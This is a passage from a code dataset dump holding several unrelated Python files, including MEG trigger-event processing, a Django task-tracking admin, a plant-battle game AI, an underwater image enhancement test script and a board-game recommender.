lukas.explode()\n","sub_path":"tetris_like.py","file_name":"tetris_like.py","file_ext":"py","file_size_in_byte":3343,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"96158764","text":"import mne\nimport numpy as np\nimport warnings\nimport scipy.io as sio\n\n\ndef events_select_condition(trigger, condition):\n \"\"\"Function to handle events and event ids\n\n Parameters\n ----------\n trigger : np.array (dims = [n,1])\n The trigger values\n condition : str\n The set of events corresponding to a specific analysis.\n\n Returns\n -------\n selection : np.array (dims = [m, 1])\n The selected trigger.\n \"\"\"\n if condition == 'stim_motor':\n selection = np.where(trigger > 0)[0]\n elif condition == 'stim':\n selection = np.where((trigger > 0) & (trigger < 4096))[0]\n elif condition == 'motor': # remove response not linked to stim\n # selection = np.where((trigger > 64) & (trigger != 128))[0]\n selection = np.where(trigger >= 4096)[0]\n return selection\n\n\ndef get_events(bhv_fname, ep_name='both'):\n \"\"\"\"Get events from matlab file\n\n Parameters\n ----------\n bhv_fname : str\n mat file path with behavioral results\n ep_name : str (default: 'both')\n string indicating if output corresponds to 'stim' events, 'motor' events\n or 'both'\n\n Returns\n -------\n events_df : pd.DataFrame\n \"\"\"\n import pandas as pd\n\n trials = sio.loadmat(bhv_fname, squeeze_me=True,\n struct_as_record=True)[\"trials\"]\n\n # Redefine key to be more explicit\n keys = [('side', 'stim_side', int),\n ('amb', 'stim_category', float),\n ('amb_word', 'stim_category', float),\n ('target_code', 'stim_code', int),\n ('key', 'motor_side', int),\n ('correct', 'motor_correct', float),\n ('RT_MEG', 'motor_RT', float),\n ('choice', 'motor_category', int)]\n\n # Create indexable dictionary\n events = list()\n for ii, trial in enumerate(trials):\n event = dict()\n # add already present fields\n for key in keys:\n event[key[1]] = trial[key[0]]\n\n # Add manual fields\n event['stim_active'] = trial['type'] == 1\n event['trigger_value'] = int(trial['ttl']['value'])\n event['motor_missed'] = not(event['motor_RT'] > 0.)\n event['trial_number'] = ii\n\n # ---- stimulus categorical ambiguity\n # NB: There seems to be an error in the matlab postproc code regarding\n # trials.amb_word. We thus need to redefine the conditions properly.\n if trial['target_code'] in [1, 2]: # [['540', 'SHO'], ['560', 'SEO']]\n event['stim_category'] = (trial['amb'] - 1.0) / 7.0\n elif trial['target_code'] in [3, 5]: # [[540, 590], [560, 580]]\n event['stim_category'] = 0.0\n elif trial['target_code'] in [4, 6]: # [[SHO, SAO], [SEO, SCO]]\n event['stim_category'] = 1.0\n else:\n raise('problem target_code!')\n\n # ---- type of passive stimulus\n if not(event['stim_active']):\n # [[540, 590], [560, 580], [SHO, SAO], [SEO, SCO]]\n if trial['amb'] == 1:\n event['stim_new'] = 0\n elif trial['amb'] == 8:\n event['stim_new'] = 1\n else:\n raise('problem target code')\n else:\n event['stim_new'] = 0\n\n # ---- stimulus contrast\n if trial['target_code'] in [1, 3, 4, 5]:\n event['stim_contrast'] = event['stim_category']\n elif trial['target_code'] in [2, 6]:\n event['stim_contrast'] = 1.0 - event['stim_category']\n else:\n raise('problem target_code!')\n\n # previous trial\n if len(events) > 1:\n if ep_name == 'both':\n previous_event = events[-2]\n else:\n previous_event = events[-1]\n for key in ['stim_category', 'stim_side',\n 'motor_category', 'motor_side']:\n event['previous_' + key] = previous_event[key]\n\n # Concatenate stim event\n if (ep_name == 'stim_lock' or ep_name == 'both'):\n event['event_type'] = 'stim'\n events.append(event)\n\n # Add motor event subject responded so as to get a single events\n # structure for both stim and resp lock\n if (ep_name == 'motor_lock' or ep_name == 'both'):\n if event['stim_active']:\n event_ = event.copy()\n event_['event_type'] = 'motor'\n events.append(event_)\n\n # store and panda DataFrame for easier manipulation\n events_df = pd.DataFrame(events)\n # RT bin\n speed_labels = ['none', 'fast', 'slow']\n speeds = np.percentile(events_df['motor_RT'], [50])\n events_df['motor_speed'] = None\n for ii in range(len(events)):\n rt = events_df['motor_RT'][ii]\n motor_speed = speed_labels[len(np.where(speeds < rt)[0]) + (rt > 0)]\n events_df['motor_speed'][ii] = motor_speed\n return events_df\n\n\ndef extract_events(fname, min_duration=0.003, first_sample=0,\n offset_to_zero_M=True, offset_to_zero_S=False):\n \"\"\"Function to 1) recompute STI101 from other channels\n 2) clean trigger channel\n 3) Add stimulus information to response channel\n\n Parameters\n ----------\n fname : str\n The filename of the event dataset.\n min_duration : float\n The minimum duration (in s) of an event\n\n Returns\n -------\n events : np.array (dims = [n_events, 3])\n Events array to pass to MNE.\n \"\"\"\n # Load data\n if fname is str:\n raw = mne.io.Raw(fname, preload=True)\n else:\n raw = fname.copy()\n\n # Dissociate STI101 into distinct channels\n raw.pick_channels(['STI101'])\n n_bits = 16\n raw._data = np.round(raw._data)\n data = np.zeros((n_bits, raw.n_times))\n for bit in range(0, n_bits)[::-1]:\n data[bit, :] = (raw._data >= 2 ** bit).astype(float)\n raw._data -= data[bit, :] * (2 ** bit)\n\n # Min duration in sample\n min_sample = min_duration * raw.info['sfreq']\n\n # Binarize trigger values to 0 and 1\n S_ch = range(0, 11)\n # Get all motor events, independently of task relevance\n cmb_M_, sample_M_ = _combine_events(data[len(S_ch):, :], min_sample,\n first_sample=first_sample,\n overlapping=False,\n offset_to_zero=offset_to_zero_M)\n # Only consider stim triggers after first button response (to avoid trigger\n # test trhat shouldn't have been recorded)\n cmb_S, sample_S = _combine_events(data[0:len(S_ch), :], min_sample,\n first_sample=sample_M_[0],\n overlapping=True,\n offset_to_zero=offset_to_zero_S)\n\n # Correct order of magnitude of M response to avoid S/M conflict\n cmb_M_ *= (2 ** len(S_ch))\n\n # Get trigger values for stim and unassociated motor\n trigger_S, trigger_M_ = cmb_S[sample_S], cmb_M_[sample_M_]\n\n # Select M responses relevant to task: first M response following trigger\n # max_delay = raw.info['sfreq'] * (2.000 + .430)\n sample_M, trigger_M = list(), list()\n for s, S in enumerate(sample_S):\n # Find first M response\n M = np.where(np.array(sample_M_) > S)[0]\n # Check its link to S\n # if (any(M) and (sample_M_[M[0]] - S) <= max_delay):\n if any(M):\n if trigger_S[s] <= 4.0: # no trigger if stim is passive\n # Add motor response to motor\n sample_M.append(sample_M_[M[0]])\n # Associate S value to M to link the two\n trigger_M.append(trigger_M_[M[0]] + trigger_S[s])\n\n # Combine S and M events\n events_S = [sample_S, np.zeros(len(sample_S)), trigger_S]\n events_M = [sample_M, np.zeros(len(sample_M)), trigger_M]\n events = np.hstack((events_S, events_M)).transpose()\n\n # Sort events chronologically\n events = events[np.argsort(events[:, 0]), :]\n\n # Add starting sample\n events[:, 0] += raw.first_samp\n\n return events\n\n\ndef _combine_events(data, min_sample, first_sample=0, overlapping=True,\n offset_to_zero=True):\n \"\"\" Function to combine multiple trigger channel into binary code \"\"\"\n n_chan, n_sample = data.shape\n cmb = np.zeros([n_chan, n_sample])\n for bit in range(0, n_chan):\n cmb[bit, :] = 2 ** bit * data[bit, :]\n cmb = np.sum(cmb, axis=0)\n\n if not overlapping:\n over_t = np.where(np.sum(data, axis=0) > 1.0)[0]\n cmb[over_t] = 0.0\n\n # Find trigger onsets and offsets\n diff = cmb[1:] - cmb[0:-1]\n diff[:first_sample] = 0 # don't consider triggers before this\n onset = np.where(diff > 0)[0] + 1\n offset = np.where(diff < 0)[0]\n\n # minimum changing time\n onset_t = np.where((onset[1:] - onset[:-1]) >= min_sample)[0]\n onset = onset[np.append(onset_t, len(onset_t))]\n offset_t = np.where((offset[1:] - offset[:-1]) >= min_sample)[0] + 1\n offset = offset[np.append(0, offset_t)]\n\n # first offsets should be after first onset\n if offset[0] < onset[0]:\n offset = offset[1:]\n # offsets must go back to 0\n if offset_to_zero:\n offset = offset[np.where(cmb[offset+1] == 0.)[0]]\n # XXX should do the same for onset?:\n # onset = onset[np.where(cmb[onset-1] == 0.)[0]]\n if len(onset) > len(offset):\n # onset = onset[:-1]\n offset = np.hstack((offset, onset[-1] + min_sample))\n warnings.warn(\"Added extra offset!\")\n\n # Remove too short samples\n duration = offset - onset\n sample = onset[duration > min_sample].tolist()\n\n return cmb, sample\n","sub_path":"ambiguity/conditions.py","file_name":"conditions.py","file_ext":"py","file_size_in_byte":9636,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"650072582","text":"import requests\r\nfrom ..base.test import BaseTestCase, AuthorizedTestCase\r\nimport uuid\r\nimport common\r\n\r\n\r\nclass T(AuthorizedTestCase):\r\n\r\n @property\r\n def path(self):\r\n return '/service/secu/underway'\r\n\r\n def setUp(self):\r\n super().setUp()\r\n self.data = {\r\n \"itemid\": \"a6523c40a08f481a92c25c6945dc7b41\",\r\n \"userid\": self.user['id']\r\n }\r\n\r\n query = '''\r\n insert into todo_underway(itemid, userid) values (:itemid, :userid);\r\n '''\r\n self.db.execute(query, self.data)\r\n self.db.commit()\r\n\r\n def test_by_correct_info(self):\r\n response = requests.delete(self.url, json={'itemid': self.data['itemid']})\r\n self.assertNotEqual(response.text, '', '返回值为空!')\r\n resp = response.json()\r\n self.assertEqual('000', resp['code'])\r\n\r\n query = '''\r\n select count(1) from todo_underway where userid=:userid and itemid=:itemid;\r\n '''\r\n\r\n result = self.db.execute(query, self.data).scalar()\r\n\r\n self.assertEqual(0, result)\r\n","sub_path":"secu/tests/underway_delete_test.py","file_name":"underway_delete_test.py","file_ext":"py","file_size_in_byte":1083,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"353375198","text":"#!/usr/bin/env python3\n\"\"\"My solution to day 5 of Advent of Code\nhttp://adventofcode.com/day/5\n\"\"\"\n\nimport sys\n\nVOWELS = 'aeiou'\n\ndef is_nice(s):\n num_vowels = 0\n for c in s:\n if c in VOWELS:\n num_vowels += 1\n if num_vowels == 3:\n break\n if num_vowels < 3:\n return False\n\n if 'ab' in s or 'cd' in s or 'pq' in s or 'xy' in s:\n return False\n\n letter = ''\n for c in s:\n if c == letter:\n return True\n else: letter = c\n return False\n\ndef count_nice(strings):\n amount = 0\n for line in strings.splitlines():\n if is_nice(line):\n amount += 1\n return amount\n\ndef is_nicer(s):\n pairs = []\n for i in range(0,len(s)-1):\n pairs.append(s[i] + s[i+1])\n pairs = set(pairs)\n for i in pairs:\n if s.count(i) > 1:\n break\n else:\n return False\n\n for i in range(0, len(s)-2):\n if s[i] == s[i+2]:\n return True\n\ndef count_nicer(strings):\n amount = 0\n for line in strings.splitlines():\n if is_nicer(line):\n amount += 1\n return amount\n\nif __name__ == '__main__' and len(sys.argv) > 1 and len(sys.argv[1]) > 0:\n print('Number of nice strings:', count_nice(sys.argv[1]))\n print('Number of nicer strings:', count_nicer(sys.argv[1]))\n","sub_path":"day5.py","file_name":"day5.py","file_ext":"py","file_size_in_byte":1327,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"64267635","text":"\"\"\"Treadmill app configurator daemon, subscribes to eventmgr events.\n\"\"\"\n\nimport click\n\nfrom .. import appcfgmgr\n\n\ndef init():\n \"\"\"Top level command handler.\"\"\"\n\n @click.command()\n @click.option('--approot', type=click.Path(exists=True),\n envvar='TREADMILL_APPROOT', required=True)\n def top(approot):\n \"\"\"Starts appcfgmgr process.\"\"\"\n mgr = appcfgmgr.AppCfgMgr(root=approot)\n mgr.run()\n\n return top\n","sub_path":"treadmill/sproc/appcfgmgr.py","file_name":"appcfgmgr.py","file_ext":"py","file_size_in_byte":452,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"635726911","text":"from datetime import datetime\nfrom django.contrib import admin\nfrom .models import *\n\ndef iniciar_tarea(modeladmin, request, queryset):\n for tarea in queryset:\n bitacora = Bitacora()\n bitacora.tarea = tarea\n bitacora.save()\n\ndef finalizar_tarea(modeladmin, request, queryset):\n queryset.update(terminada=True)\n\ndef finalizar_bitacora(modeladmin, request, queryset):\n queryset.update(fin=datetime.now())\n\nclass TareaInLine(admin.TabularInline):\n model = Tarea\n extra = 1\n\n\nclass BitacoraInLine(admin.StackedInline):\n model = Bitacora\n extra = 1\n\n\n@admin.register(Proyecto)\nclass ProyectoAdmin(admin.ModelAdmin):\n inlines = [TareaInLine]\n\n\n@admin.register(Tarea)\nclass TareaAdmin(admin.ModelAdmin):\n list_display = [\n 'nombre',\n 'descripcion',\n 'proyecto',\n 'terminada',\n 'fecha_de_entrega',\n 'usuario',\n 'responsable'\n ]\n actions = [iniciar_tarea, finalizar_tarea]\n list_filter = ['responsable', 'terminada']\n inlines = [BitacoraInLine]\n\n def get_queryset(self, request):\n qs = super(TareaAdmin, self).get_queryset(request)\n if not request.user.is_superuser:\n qs = qs.filter(responsable=request.user)\n return qs\n\n def save_model(self, request, obj, form, change):\n if not request.user.is_superuser:\n obj.responsable = request.user\n obj.save()\n\n\n@admin.register(Bitacora)\nclass BitacoraAdmin(admin.ModelAdmin):\n list_display = [\n 'tarea',\n 'inicio',\n 'fin'\n ]\n actions = [finalizar_bitacora]\n\n def get_queryset(self, request):\n qs = super(BitacoraAdmin, self).get_queryset(request)\n if not request.user.is_superuser:\n qs = qs.filter(tarea__responsable__id=request.user.id)\n return qs\n","sub_path":"pepepecas/apps/bitacora/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":1819,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"279686778","text":"#-*-python-*-\nfrom BaseAI import BaseAI\nfrom GameObject import *\nimport math\nimport random\n\nclass AI(BaseAI):\n \"\"\"The class implementing gameplay logic.\"\"\"\n @staticmethod\n def username():\n return \"Shell AI\"\n\n @staticmethod\n def password():\n return \"password\"\n \n MOTHER = 0\n SPAWNER = 1\n CHOKER = 2\n SOAKER = 3\n BUMBLEWEED = 4\n ARALIA = 5\n TITAN = 6\n POOL = 7\n\n ##This function is called once, before your first turn\n def init(self):\n #set up me field\n self.me = self.players[self.playerID]\n #set up mother field\n self.mother = self.getMyPlants()[0]\n \n #set up directionOfEnemy field\n #if our mother is on the left side of the map, the enemy must be on the right side\n #and vice versa of course\n if self.mother.x < self.mapWidth/2:\n self.directionOfEnemy = 1\n else:\n self.directionOfEnemy = -1\n pass\n\n ##This function is called once, after your last turn\n def end(self):\n pass\n\n ##This function is called each time it is your turn\n ##Return true to end your turn, return false to ask the server for updated information\n def run(self):\n myPlants = self.getMyPlants()\n #for every plant we own, move them forward and attack if it finds an enemy\n for plant in myPlants:\n #only try radiating if it's possible\n if plant.radiatesLeft > 0:\n #only heal or buff allies and attack enemies\n targetOwner = 1 - self.playerID\n if plant.mutation == self.BUMBLEWEED or plant.mutation == self.SOAKER:\n targetOwner = self.playerID\n\n for foe in self.plants:\n #if it's dead skip it\n if foe.rads >= foe.maxRads:\n continue\n\n #don't mess with pools\n if foe.mutation == self.POOL:\n continue\n\n #if it's not the right target\n if foe.owner != targetOwner:\n continue\n\n #if a healer or soaker can't effect the mother weed\n if targetOwner == self.playerID and foe.mutation == self.MOTHER:\n continue\n\n #if a soaker can't effect other soakers\n if plant.mutation == self.SOAKER and foe.mutation == self.SOAKER:\n continue\n\n #if we're within range...\n if self.distance(plant.x, plant.y, foe.x, foe.y) < plant.range:\n #get 'im!\n plant.radiate(foe.x, foe.y)\n break\n\n #move them straight to the other side. no regrets.\n #move as far as possible, as long as it's not off the map\n wantedX = plant.x\n if plant.mutation == self.BUMBLEWEED:\n wantedX += self.directionOfEnemy * self.bumbleweedSpeed\n else:\n wantedX += self.directionOfEnemy * self.uprootRange\n if plant.uprootsLeft > 0 and self.getPlantAt(wantedX, plant.y) is None and 0 <= wantedX < self.mapWidth:\n plant.uproot(wantedX, plant.y)\n\n #make a new plant every turn, because why not?\n #first, check if we can actually do that\n if len(myPlants) >= self.maxPlants:\n #end turn\n return True\n\n spawnX = -1\n spawnY = -1\n angle = 0\n loc = 0\n for plant in myPlants:\n #remove all plants in our list except for mothers and spawners\n if not (plant.mutation == self.MOTHER or plant.mutation == self.SPAWNER):\n myPlants.remove(plant)\n\n #get a random spawner or mother plant\n spawnerPlant = myPlants[random.randint(0, len(myPlants) - 1)]\n\n #get a new position centered around that spawner within its range\n #also, keep generating new coordinates until they become valid ones\n #Remember from trig:\n #(random x inside a circle) = centerX + rand(0,1)*radius*cos(angle)\n spawnCheckLimit = 0\n while not self.withinBounds(spawnX, spawnY) or self.getPlantAt(spawnX, spawnY) is not None:\n angle = random.random() * 2 * math.pi\n while spawnX < 0 or spawnX >= self.mapWidth:\n spawnX = spawnerPlant.x + int(random.random() * spawnerPlant.range * math.cos(angle))\n while spawnY < 0 or spawnY >= self.mapHeight:\n spawnY = spawnerPlant.y + int(random.random() * spawnerPlant.range * math.sin(angle))\n spawnCheckLimit += 1\n #if we try to spawn too many times, just give up and end the turn\n if spawnCheckLimit > 10:\n return True\n #spawn a random type of plant that isn't a mother or a pool at the coordinates we made\n #of course, make sure we have enough spores to do the job!\n mutationType = random.randint(1, 6)\n if self.me.spores >= self.mutations[mutationType].spores and self.withinSpawnerRange(spawnX, spawnY):\n self.me.germinate(spawnX, spawnY, mutationType)\n return 1\n\n #Helper function to get all of the plants owned\n def getMyPlants(self):\n myPlants = []\n for plant in self.plants:\n if plant.owner == self.playerID:\n myPlants.append(plant)\n return myPlants\n\n #Helper function to get distance as a whole number\n def distance(self, x1, y1, x2, y2):\n return int((math.sqrt(math.pow(x1-x2,2)+math.pow(y1-y2,2))))\n \n #Helper function to get a Plant at a point\n #Returns None if no plant found\n def getPlantAt(self, x, y):\n #if it's out of bounds, we don't need to check anything\n if not self.withinBounds(x, y):\n return None\n \n #for every plant, if a plant is at the position we want, return it\n for plant in self.plants:\n if plant.x == x and plant.y == y:\n return plant\n\n return None\n\n #Helper function for bounds checking\n def withinBounds(self, x, y):\n if x < 0 or x >= self.mapWidth or y < 0 or y >= self.mapHeight:\n return False\n return True\n\n #Helper function to check if we're within range of a Spawner or Mother\n def withinSpawnerRange(self, x, y):\n #No need to check if we're not within the bounds of the map\n if not self.withinBounds(x, y):\n return False\n\n #for every plant\n for plant in self.plants:\n #check for ownership and correct mutation\n if plant.owner == self.me.id and (plant.mutation == self.SPAWNER or plant.mutation == self.MOTHER):\n #if we're within range, we're good\n if self.distance(x, y, plant.x, plant.y) < plant.range:\n return True\n\n #if we found none, nope\n return False\n\n def __init__(self, conn):\n BaseAI.__init__(self, conn)\n","sub_path":"ShellAI/python/AI.py","file_name":"AI.py","file_ext":"py","file_size_in_byte":6220,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"395359689","text":"import sys\nimport os\ncurPath = os.path.abspath(os.path.dirname(__file__))\nrootPath = os.path.split(curPath)[0]\nsys.path.append(rootPath)\n\nimport argparse\nimport torch\nimport time\nimport os.path as osp\nfrom torch.nn.parallel import DataParallel\nfrom UW.utils import Config\nfrom UW.core.Models import build_network\nfrom UW.core.Datasets import build_dataset, build_dataloader\nfrom UW.core.Optimizer import build_optimizer, build_scheduler\nfrom UW.utils import (mkdir_or_exist, get_root_logger,\n save_epoch, save_latest, save_item, normimage_test,\n resume, load, normPRED)\n\nfrom UW.utils.save_image import (save_image, normimage,\n save_ensemble_image, save_ensemble_image_8)\n\n\nfrom tensorboardX import SummaryWriter\n# TORCH_VERSION = torch.__version__\n# if TORCH_VERSION < '1.1' or TORCH_VERSION == 'parrots':\n# try:\n# from tensorboardX import SummaryWriter\n# except ImportError:\n# raise ImportError('Please install tensorboardX to use '\n# 'TensorboardLoggerHook.')\n# else:\n# try:\n# from torch.utils.tensorboard import SummaryWriter\n# except ImportError:\n# raise ImportError(\n# 'Please run \"pip install future tensorboard\" to install '\n# 'the dependencies to use torch.utils.tensorboard '\n# '(applicable to PyTorch 1.1 or higher)')\n\nfrom getpass import getuser\nfrom socket import gethostname\ndef get_host_info():\n return f'{getuser()}@{gethostname()}'\n\n\ndef parse_args():\n parser = argparse.ArgumentParser(description='Train a detector')\n parser.add_argument('--config',type=str,\n default='/home/dong/GitHub_Frame/UW/config/UWCNN.py',\n help='train config file path')\n parser.add_argument('--load_from',\n default='/home/dong/GitHub_Frame/UW/checkpoints/UWCNN/UWCNN_type3.pth',\n help='the dir to save logs and models,')\n parser.add_argument('--savepath', help='the dir to save logs and models,')\n group_gpus = parser.add_mutually_exclusive_group()\n group_gpus.add_argument(\n '--gpus',\n default=1,\n type=int,\n help='number of gpus to use '\n '(only applicable to non-distributed training)')\n group_gpus.add_argument(\n '--gpu-ids',\n type=int,\n nargs='+',\n help='ids of gpus to use '\n '(only applicable to non-distributed training)')\n args = parser.parse_args()\n return args\n\n\n\nif __name__ == '__main__':\n args = parse_args()\n cfg = Config.fromfile(args.config)\n if args.load_from is not None:\n # update configs according to CLI args if args.work_dir is not None\n cfg.load_from = args.load_from\n if args.savepath is not None:\n # update configs according to CLI args if args.work_dir is not None\n cfg.savepath = args.savepath\n elif cfg.get('work_dir', None) is None:\n # use config filename as default work_dir if cfg.work_dir is None\n cfg.savepath = osp.join('./results',\n osp.splitext(osp.basename(args.config))[0])\n if args.gpu_ids is not None:\n cfg.gpu_ids = args.gpu_ids\n else:\n cfg.gpu_ids = range(1) if args.gpus is None else range(args.gpus)\n\n mata = dict()\n\n # make dirs\n mkdir_or_exist(osp.abspath(cfg.savepath))\n timestamp = time.strftime('%Y%m%d_%H%M%S', time.localtime())\n cfg.log_file = osp.join(cfg.savepath, f'{timestamp}.log')\n\n # create text log\n # build model\n model = build_network(cfg.model, train_cfg=cfg.train_cfg, test_cfg=cfg.test_cfg)\n load(cfg.load_from, model, None)\n # build dataset\n datasets = build_dataset(cfg.data.test)\n # put model on gpu\n if torch.cuda.is_available():\n # model = DataParallel(model.cuda(), device_ids=cfg.gpu_ids)\n model = model.cuda()\n # create data_loader\n data_loader = build_dataloader(\n datasets,\n cfg.data.val_samples_per_gpu,\n cfg.data.val_workers_per_gpu,\n len(cfg.gpu_ids))\n\n save_cfg = False\n for i in range(len(cfg.test_pipeling)):\n if 'Normalize' == cfg.test_pipeling[i].type:\n save_cfg = True\n\n save_path = osp.join(cfg.savepath, cfg.load_from.split('/')[-1].split('.')[0])\n mkdir_or_exist(save_path)\n # before run\n model.eval()\n t = time.time()\n for i, data in enumerate(data_loader):\n # before iter\n\n inputs = data['image']\n with torch.no_grad():\n out_rgb = model(inputs)\n print('writing' + data['image_id'][0] + '.png')\n # input_numpy = normimage_test(inputs, save_cfg=save_cfg)\n rgb_numpy = normimage_test(out_rgb, save_cfg=save_cfg, usebytescale=cfg.usebytescale)\n\n outsavepath = osp.join(save_path, data['image_id'][0] + '.png')\n inputsavepath = osp.join(save_path, data['image_id'][0] + '_input.png')\n\n # save_image(input_numpy, inputsavepath)\n save_image(rgb_numpy, outsavepath, usebytescale=cfg.usebytescale)\n\n\n","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":5082,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"506796352","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# ## Proxy users recommender model\n\n# In[1]:\n\n\nimport numpy as np\nimport pandas as pd\nfrom sklearn.base import BaseEstimator, ClassifierMixin\nfrom sklearn.decomposition import TruncatedSVD, PCA\nfrom scipy.spatial.distance import cdist\nfrom sklearn.preprocessing import StandardScaler\nfrom numpy.random import shuffle\nimport bz2\nimport pickle\n\n# Recommender model 1: Proxy User Search\nclass RecommenderProxyUsers():\n \"\"\"recommender engine as an estimator\"\"\"\n\n # ******************************************************************\n def __init__(self, n_proxy_users=10):\n \"\"\"\n Called when initializing the model\n \"\"\"\n # model parameters\n self.n_proxy_users = n_proxy_users\n \n self.user_data = None\n self.item_data = None\n self.n_top_items = 10\n self.user_factors = None \n self.item_factors = None \n self.user_top_rated = None \n self.item_id_to_index_dict = None\n self.user_info = None\n\n # ******************************************************************\n def set_params(self, **params):\n self.__dict__.update(params)\n \n # ******************************************************************\n def read_model_data(self, filepath):\n\n with bz2.BZ2File(filepath, 'rb') as pickle_in:\n [self.user_data, self.item_data] = pickle.load(pickle_in)\n \n # set any games with no categories or mechanics to 'none'\n self.item_data.loc[self.item_data['categories'].isnull(), 'categories'] = 'none'\n self.item_data.loc[self.item_data['mechanics'].isnull(), 'mechanics'] = 'none'\n\n # column labels for data subsets\n user_top_cols = [col for col in self.user_data.columns if 'top_' in col]\n user_factor_cols = [col for col in self.user_data.columns if 'factor_' in col]\n item_factor_cols = [col for col in self.item_data.columns if 'factor_' in col]\n item_info_cols = [col for col in self.item_data.columns if 'factor_' not in col]\n\n # split up data for faster processing\n self.user_factors = self.user_data[user_factor_cols].values\n self.user_top_rated = self.user_data[user_top_cols].values \n \n # number of top items (games) in this dataset\n self.n_top_items = self.user_top_rated.shape[1]\n \n self.item_factors = self.item_data[item_factor_cols].values \n self.item_info = self.item_data[item_info_cols]\n \n self.item_id_to_index_dict = {key: value for (key, value) in \n zip(self.item_data['id'], \n range(len(self.item_data['id'])))}\n \n self.item_title_to_id_dict = {key: value for (key, value) in \n zip(self.item_data['name'].str.lower(), \n self.item_data['id'].astype(int))}\n \n # ******************************************************************\n def get_tags_from_csv_list(self, taglist):\n \"\"\"Create df with all unique tags contained in \n list of csv strings containing multiple tags each.\n Returns tags and counts sorted by most frequent to least.\"\"\"\n all_tags = []\n for tagset in taglist:\n all_tags += tagset.split(',')\n unique_tags, counts = np.unique(all_tags, return_counts=True)\n return pd.DataFrame( {'tag':unique_tags, 'count':counts} ).sort_values(\n by='count', ascending=False)\n\n # ******************************************************************\n def get_categories_and_mechanics(self):\n \"\"\"return lists of all category and mechanic labels\"\"\"\n \n # get all categories, sorted by counts\n categories = self.get_tags_from_csv_list(self.item_data['categories'].values)\n \n # remove expansion tag from list\n categories = categories[categories['tag'] != 'Expansion for Base-game']\n\n # get list of all mechanics, sorted by counts\n mechanics = self.get_tags_from_csv_list(self.item_data['mechanics'].values)\n \n return categories, mechanics\n \n # ******************************************************************\n def get_item_title_id(self, titles):\n \"\"\"return list of integer item IDs given title names (case insensitive)\"\"\"\n return [self.item_title_to_id_dict[title.lower()] for title in titles]\n \n # ******************************************************************\n def get_item_id_index(self, ids):\n \"\"\"return list of array indices given item IDs\"\"\"\n return [self.item_id_to_index_dict[itemid] for itemid in ids]\n\n # ******************************************************************\n def get_filtered_item_index(self, items, \n weightrange=[1,5],\n minrating=1,\n categories_include=[],\n categories_exclude=[],\n mechanics_include=[],\n mechanics_exclude=[]):\n\n # start with all data\n filt_items = items\n\n# print('filter_data, all data:',filt_items.shape)\n\n # filter by game weight\n # only filter if not defaults: [1,5]\n if weightrange[0] > 1 or weightrange[1] < 5:\n filt_items = filt_items[ (filt_items['weight'] >= weightrange[0]) &\n (filt_items['weight'] <= weightrange[1])]\n# print('weightrange, filt_items:',filt_items.shape)\n\n # filter by lowest average game rating\n # only filter if not default: 1\n if minrating > 1:\n filt_items = filt_items[ filt_items['mean_rating'] >= minrating ]\n# print('minrating, filt_items:',filt_items.shape)\n\n def tags_in_col(col, taglist):\n return col.apply(lambda x: any(tag in x for tag in taglist))\n\n # filter by categories to include\n # only filter if not default: [], or ['Any category',...]\n if (len(categories_include) and \n 'Any category' not in categories_include):\n filt_items = filt_items[ tags_in_col(filt_items['categories'], categories_include)]\n# print('categories_include, filt_items:',filt_items.shape)\n\n # filter by categories to exclude\n # only filter if not default: []\n if len(categories_exclude):\n filt_items = filt_items[ ~(tags_in_col(filt_items['categories'], categories_exclude))]\n# print('categories_exclude, filt_items:',filt_items.shape)\n\n # filter by mechanics to include\n # only filter if not default: [], or ['Any category',...]\n if (len(mechanics_include) and \n 'Any mechanism' not in mechanics_include):\n filt_items = filt_items[ tags_in_col(filt_items['mechanics'], mechanics_include)]\n# print('mechanics_include, filt_items:',filt_items.shape)\n\n# print(' filt_items:',filt_items.shape)\n\n return self.get_item_id_index(filt_items['id'])\n\n # ******************************************************************\n def get_sorted_proxy_index(self, user_liked):\n liked_idx_set = set(self.get_item_id_index(user_liked))\n scores = [-len(liked_idx_set.intersection(row)) for row in self.user_top_rated]\n return np.argsort(scores)\n\n # ******************************************************************\n def ratings_from_factors(self, row_index):\n return (np.dot(self.user_factors[row_index,:], self.item_factors.T))\n \n # ******************************************************************\n def recommend_items_by_pref_list(self, liked_item_ids, num2rec=10, **filtargs): \n \n \"\"\"Recommend games using multiple liked games in a list of titles.\n This method creates a set of recommended games for each title in prefs and\n then selects the most commonly recommended\"\"\"\n \n # get indices to proxy users\n proxy_idx = self.get_sorted_proxy_index(liked_item_ids)\n\n # average ratings for all items among proxy users\n ratings = np.mean(self.ratings_from_factors(proxy_idx[:self.n_proxy_users]), axis=0)\n \n # Create some randomness here by adding a +/- random \n # value to the ratings\n randrange = .2\n randvals = np.random.random(len(ratings))*randrange\n fuzzed_ratings = np.multiply(ratings, randvals)\n \n # get indices of filter allowed items\n filt_item_idx = self.get_filtered_item_index(self.item_info, **filtargs)\n \n def filter_items(item_idx, filter_idx, liked_item_ids):\n \"\"\"return ordered list of item indices that intersect with filter_idx.\n Also, exclude games in the liked item list\"\"\"\n filt_ids = [i for i in item_idx if i in set(filter_idx)]\n return [i for i in filt_ids if not i in set(liked_item_ids)] \n \n # filtered descending sort of item ratings\n item_idx = filter_items(np.argsort(-fuzzed_ratings), \n filt_item_idx, \n self.get_item_id_index(liked_item_ids))\n \n # select num2rec top rated game IDs \n return self.item_data['name'].values[item_idx[:num2rec]]\n \n \n\n","sub_path":"capstone_2/deploy_bokeh_top_ALS_rating_proxy/bokeh_app/recommender_proxy_users.py","file_name":"recommender_proxy_users.py","file_ext":"py","file_size_in_byte":9424,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"45887794","text":"import 